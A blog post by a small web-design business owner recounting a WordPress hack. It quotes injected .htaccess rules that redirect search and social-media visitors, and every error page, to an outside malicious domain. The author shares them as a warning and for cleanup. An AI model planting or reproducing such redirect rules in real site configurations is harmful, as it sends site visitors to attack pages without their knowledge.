It’s just wrong!!
a&b WebDesign has been hacked and Malware was inserted into the site. I am not sure how it happened, but what a mess!!!! I had to delete everything and start over with a whole new installation. That’s when one gets to appreciate the real value of a good backup. Mine could have been better, but I had enough to recreate everything, and I’ve learned some valuable new lessons.
However, I don’t take kindly to this kind of act. There’s not much I can do about it, but post whatever information I have gained and hope it will help someone else. The first attack was on my .htaccess files, where I found this: (I am only posting an image of the stuff. I do not know what this code does, and do not want to unleash their evil accidentally):
I still have no idea what that all means, but it was easy enough to delete. But only the next day, I found this in the same .htaccess file:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|
goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog
|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://piramiddynamyc.in/sapog/index.php [R=301,L]
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
ErrorDocument 400 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 401 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 403 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 404 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 500 http://piramiddynamyc.in/sapog/index.php
I don’t know who you are, piramiddynamyc.in, but you are not and will never be my friend. And whoever reads this, don’t go there. I tried, just to see the enemy’s camp, and FireFox warned me that this was an attack site, so I didn’t enter.
Unfortunately, it didn’t stop here – just when I thought my house was clean again, all my .php files got attached. Now talk about a huge mess – there are loads of those inside a WordPress site. This time, I found the code shown in this image. Clearly, I had been attacked by www.turnitupnow.net – or on behalf of them.
I don’t know what kind of a crap organization turnitupnow.net is, that they resort to this kind of ‘advertising’. I suspect that all three attacks were done by the same person(s), and I sincerely hope someone out there knows enough to shut them down once and for all. I have wasted the last week of my life cleaning up their mess, and I’m still not completely done.
but you know, I’ve learned a lot …
3 thoughts on “It’s just wrong!!”
Do you have a problem with spambots spamming your blog with comments? Click [Spam Link Deleted] for the solution.
Actually, the captcha feature takes care of spam form submissions, and the WordPress Akismet handles the rest. My main concern right now are manual spammers – but since I have WordPress set to where I need to pre-approve any comments, none of the spammy ones will ever make it to the actual site.
I’ve found that WordPress is especially a target for these kinds of things and it is quite ridiculous… spam e-mails, blog comments and the like. I don’t know of a fix yet.